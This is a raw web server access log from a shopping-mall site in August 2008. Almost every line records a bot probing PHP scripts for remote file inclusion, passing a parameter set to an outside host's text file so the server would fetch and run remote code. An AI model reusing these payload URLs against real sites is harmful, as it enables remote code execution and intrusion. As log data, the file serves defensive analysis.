85.158.181.11 - - [26/Aug/2008:23:33:15 -0700] "GET /logs/access_080714.log//include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:34:33 -0700] "GET /logs/access_080728.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:34:33 -0700] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:34:33 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:34:43 -0700] "GET /logs/access_080806.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:36:19 -0700] "GET /logs/access_080806.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:41 -0700] "GET /logs/access_080703.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/g.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/g.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:43 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/g.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:54 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:54 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:36:54 -0700] "GET /logs/access_080703.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
216.32.81.226 - - [26/Aug/2008:23:37:34 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
216.32.81.226 - - [26/Aug/2008:23:37:34 -0700] "GET //appserv/main.php?appserv_root=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
216.32.81.226 - - [26/Aug/2008:23:37:35 -0700] "GET /logs//appserv/main.php?appserv_root=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:37:38 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:37:38 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:37:40 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:37:40 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:37:40 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
93.190.137.238 - - [26/Aug/2008:23:37:57 -0700] "GET /logs/padrao.php?seite=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.oldfactorymall.com"
93.190.137.238 - - [26/Aug/2008:23:37:57 -0700] "GET /padrao.php?seite=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.oldfactorymall.com"
216.32.81.226 - - [26/Aug/2008:23:38:17 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.55.37.146 - - [26/Aug/2008:23:38:33 -0700] "GET /logs/access_080810.log/?path[docroot]=http://www.21stcenturywoman.com/new/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:38:53 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:38:53 -0700] "GET //appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:38:54 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:39:02 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:39:18 -0700] "GET /logs/access_080712.log%20//?path%5Bdocroot%5D=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
212.115.37.130 - - [26/Aug/2008:23:39:25 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.oldfactorymall.com"
212.115.37.130 - - [26/Aug/2008:23:39:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.oldfactorymall.com"
92.51.145.83 - - [26/Aug/2008:23:39:39 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.oldfactorymall.com"
92.51.145.83 - - [26/Aug/2008:23:39:39 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.oldfactorymall.com"
81.29.112.219 - - [26/Aug/2008:23:40:06 -0700] "GET /logs/access_080810.log//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:40:13 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:40:15 -0700] "GET /logs/access_080703.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:40:15 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:40:19 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
81.177.3.99 - - [26/Aug/2008:23:41:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.oldfactorymall.com"
81.177.3.99 - - [26/Aug/2008:23:41:26 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:41:36 -0700] "GET /logs/access_080807.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:01 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:19 -0700] "GET /logs/access_080703.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:19 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:34 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:35 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:42:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:42:59 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:43:00 -0700] "GET /logs/access_080728.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:43:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:43:00 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:43:00 -0700] "GET /logs/access_080703.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:43:00 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
128.163.2.43 - - [26/Aug/2008:23:43:32 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [26/Aug/2008:23:43:33 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [26/Aug/2008:23:43:33 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:43:38 -0700] "GET /logs/access_080722.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:43:44 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
128.163.2.43 - - [26/Aug/2008:23:44:52 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:45:55 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:46:10 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
128.163.2.43 - - [26/Aug/2008:23:46:43 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [26/Aug/2008:23:48:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [26/Aug/2008:23:48:32 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [26/Aug/2008:23:48:32 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:49:50 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:00 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:34 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:34 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:36 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:54 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:54 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:50:54 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:51:12 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:51:12 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:51:12 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
85.114.130.225 - - [26/Aug/2008:23:52:09 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
85.114.130.225 - - [26/Aug/2008:23:52:09 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
85.114.130.225 - - [26/Aug/2008:23:52:09 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
62.149.232.117 - - [26/Aug/2008:23:53:17 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [26/Aug/2008:23:53:20 -0700] "GET /logs/access_080714.log//squirrelcart/cart_content.php?cart_isp_root=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:53:48 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:53:48 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:54:47 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:54:48 -0700] "GET /logs/access_080703.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:55:28 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:55:28 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [26/Aug/2008:23:55:29 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:55:51 -0700] "GET /logs/access_080729.log//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:55:51 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:55:51 -0700] "GET /logs//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
216.246.46.244 - - [26/Aug/2008:23:56:10 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
216.246.46.244 - - [26/Aug/2008:23:56:10 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:56:19 -0700] "GET /logs/access_080803.log//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
213.252.17.105 - - [26/Aug/2008:23:56:36 -0700] "GET /logs/access_080720.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
213.252.17.105 - - [26/Aug/2008:23:56:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
213.252.17.105 - - [26/Aug/2008:23:56:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
87.230.106.248 - - [26/Aug/2008:23:56:49 -0700] "GET /logs/access_080729.log//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
87.230.106.248 - - [26/Aug/2008:23:56:50 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
87.230.106.248 - - [26/Aug/2008:23:56:51 -0700] "GET /logs//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
213.252.17.105 - - [26/Aug/2008:23:56:58 -0700] "GET /logs/access_080627.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
82.194.76.177 - - [26/Aug/2008:23:58:30 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.oldfactorymall.com"
82.194.76.177 - - [26/Aug/2008:23:58:30 -0700] "GET //modules/Forums/admin/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.oldfactorymall.com"
69.19.225.130 - - [26/Aug/2008:23:58:45 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:59:20 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:59:21 -0700] "GET //?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:59:21 -0700] "GET /logs//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
205.234.186.117 - - [26/Aug/2008:23:59:55 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:00:26 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
213.252.17.105 - - [27/Aug/2008:00:01:01 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:01:53 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:01:53 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:01:54 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
205.234.186.117 - - [27/Aug/2008:00:02:19 -0700] "GET //?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:02:26 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
